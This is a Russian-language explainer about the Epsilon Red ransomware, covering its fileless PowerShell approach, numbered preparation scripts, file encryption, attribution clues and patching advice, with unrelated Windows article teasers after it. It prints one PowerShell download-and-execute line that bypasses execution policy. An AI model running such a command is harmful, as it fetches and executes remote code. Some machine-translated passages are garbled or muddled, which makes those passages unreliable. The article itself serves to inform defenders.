Вы уже пропатчили свои серверы ?
Новая угроза -вымогатель под названием Epsilon Red нацелена на неисправленные серверы Microsoft в корпоративных центрах обработки данных. Названный в честь малоизвестного злодея из комиксов Marvel, Epsilon Red недавно был обнаружен компанией по кибербезопасности Sophos. С момента своего обнаружения программа-вымогатель атаковала многие организации по всему миру.
Бесфайловый вирус-вымогатель «прячется» в PowerShell
Бесфайловые программы-вымогатели — это разновидность вредоносного ПО, которое запускается в комплекте с законным программным обеспечением. Бесфайловое вредоносное ПО на базе PowerShell использует способность PowerShell загружаться непосредственно в память устройства. Эта функция помогает защитить вредоносное ПО в сценариях PowerShell от обнаружения.
В типичном сценарии при выполнении сценария его сначала необходимо записать на диск устройства. Это позволяет решениям по обеспечению безопасности конечных точек обнаруживать сценарии. Поскольку PowerShell исключен из стандартных процессов выполнения сценариев, он может обходить безопасность конечных точек. Кроме того, использование параметра обхода в сценарии PowerShell позволяет злоумышленнику обойти ограничения сетевых сценариев.
Пример параметра обхода PowerShell:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Как видите, разработать параметры обхода PowerShell относительно просто.
В ответ Microsoft выпустила патч для устранения уязвимости удаленного выполнения вредоносного ПО, связанной с PowerShell. Однако патчи эффективны ровно настолько, насколько они используются. Многие организации смягчили стандарты установки исправлений, что сделало их среду уязвимой для атак. Цель Epsilon Red — воспользоваться этим уровнем уязвимости.
Двойная полезность Epsilon Red
Поскольку Epsilon Red наиболее эффективен против необновленных серверов Microsoft, вредоносное ПО можно использовать в качестве вымогателя и инструмента идентификации. Независимо от того, успешен ли Epsilon в среде, злоумышленники получают более полное представление о возможностях безопасности своей цели.
Если Epsilon удалось получить доступ к Microsoft Exchange Server, это означает, что организация не соблюдает общие рекомендации по обеспечению безопасности с помощью исправлений. Для злоумышленника это показывает, насколько легко Epsilon может скомпрометировать остальную среду цели.
Epsilon Red использует затемнение, чтобы скрыть свою полезную нагрузку. Обфускация делает код нечитаемым и используется во вредоносных программах PowerShell, чтобы избежать высокой читаемости сценариев PowerShell. При обфускации используются командлеты -псевдонимы PowerShell , которые затрудняют антивирусному программному обеспечению обнаружение вредоносных сценариев в журналах PowerShell.
Epsilon Red наиболее эффективен против непропатченных серверов Microsoft.
Однако запутанные сценарии PowerShell все равно можно идентифицировать. Распространенным признаком предстоящей атаки PowerShell Script является создание объекта WebClient. Злоумышленник создаст объект WebClient в коде PowerShell, чтобы установить внешнее соединение с удаленным URL-адресом , содержащим вредоносный код.
Если организация подвергается атаке, вероятность того, что она имеет достаточные меры безопасности для обнаружения запутанных сценариев PowerShell, очень мала. И наоборот, если Epsilon Red не удастся проникнуть на сервер, это укажет злоумышленнику на то, что сеть цели может быстро расшифровать вредоносное ПО PowerShell, что сделает атаку менее ценной и более ценной.
Кибер-вторжение Эпсилон Ред
Функционал Epsilon Red очень прост. Программное обеспечение использует серию скриптов Powershell для проникновения на серверы. Эти сценарии PowerShell пронумерованы от 1.ps1 до 12.ps1. Целью каждого сценария PowerShell является подготовка целевого сервера для окончательной полезной нагрузки.
Все сценарии PowerShell в Epsilon Red имеют свое предназначение. Один из сценариев PowerShell в Epsilon Red предназначен для разрешения правил брандмауэра целевой сети. Еще одно программное обеспечение из этой серии, предназначенное для удаления антивирусного программного обеспечения цели .
Как вы могли догадаться, эти сценарии работают синхронно, чтобы гарантировать, что после доставки полезной нагрузки цель не сможет быстро остановить ее продвижение.
Передача полезной нагрузки
Как только сценарии PowerShell от Epsilon освобождают место для своей окончательной полезной нагрузки, они распространяются как расширение Red.exe . При входе на сервер Red.exe сканирует файлы сервера и создает список путей к каталогам для каждого обнаруженного файла. После создания списка дочерние процессы создаются из основного файла вредоносной программы для каждого пути к каталогу в списке. Затем каждый подфайл программы-вымогателя шифрует путь к каталогу из файла списка.
После того, как все пути к папкам в списке Epson будут зашифрованы, останется файл .txt для информирования цели и запроса злоумышленника. Кроме того, все доступные сетевые узлы, подключенные к скомпрометированному серверу, будут скомпрометированы, и вероятность проникновения вредоносного ПО в сеть может возрасти.
Кто стоит за Эпсилон Ред?
Личности нападавших за «Эпсилон Ред» до сих пор неизвестны.
Личности нападавших, стоящих за Эпсилон Ред, до сих пор неизвестны. Однако некоторые улики указывают на происхождение нападавших. Первая подсказка — это название вредоносного ПО. Эпсилон Ред — злодей из «Людей Икс» русского происхождения.
Вторая подсказка заключается в записке о выкупе в файле .txt, который оставил код. Оно похоже на записку, оставленную бандой вымогателей REvil. Однако такое сходство не указывает на то, что нападавшие были членами этой банды. REvil осуществляет операцию RaaS (программа-вымогатель как услуга), в рамках которой филиалы платят REvil за доступ к ее вредоносному ПО.
Защитите себя от Эпсилон Ред
На данный момент Epsilon Red успешно проникает на неисправленные серверы. Это означает, что одна из лучших мер защиты от Epsilon Red и аналогичных вредоносных программ-вымогателей — обеспечить правильное управление вашей средой. Кроме того, наличие решения безопасности, которое может быстро расшифровывать сценарии PowerShell, будет полезным дополнением к вашей среде.
Microsoft добавила функцию Ultimate Performance в обновление Windows 10 в апреле 2018 года. Понятно, что это функция, которая помогает системе перейти в высокопроизводительный рабочий режим.
Если вам нравится новый значок проводника, такой как Windows 10 Sun Valley, следуйте статье ниже, чтобы изменить совершенно новый интерфейс проводника.
Проверить, хорошо ли работает веб-камера на компьютере с Windows, можно быстро и легко. Ниже приведены инструкции, которые помогут вам проверить камеру.
Возможно, у вас подключены наушники хорошего качества, но ноутбук с Windows по какой-то причине продолжает пытаться записывать, используя свой ужасный встроенный микрофон. В следующей статье вы узнаете, как протестировать микрофон Windows 10.
Если он вам больше не нужен, вы можете удалить параметр «Сканировать с помощью Malwarebytes» из контекстного меню, вызываемого правой кнопкой мыши. Вот как.
Протокол пограничного шлюза (BGP) используется для обмена информацией о маршрутизации в Интернете и является протоколом, используемым между интернет-провайдерами (которые являются разными AS).
Читая советы, вы видите, что люди часто используют файлы взлома реестра для настройки компьютеров с Windows, и задаетесь вопросом, как их создать. Эта статья проведет вас через основные шаги по созданию собственного файла взлома реестра.
Microsoft использовала автоматическое резервное копирование реестра, но эта функция была незаметно отключена в Windows 10. В этой статье Quantrimang.com покажет вам, как автоматически создавать резервную копию реестра в папке. RegBack (Windows\System32\config) \RegBack) в Windows 10.
При использовании компьютера совершать ошибки совершенно нормально.
Ваше Ethernet-соединение иногда может раздражать вас, отключаясь без видимой причины на вашем ПК с Windows 10 или 11.
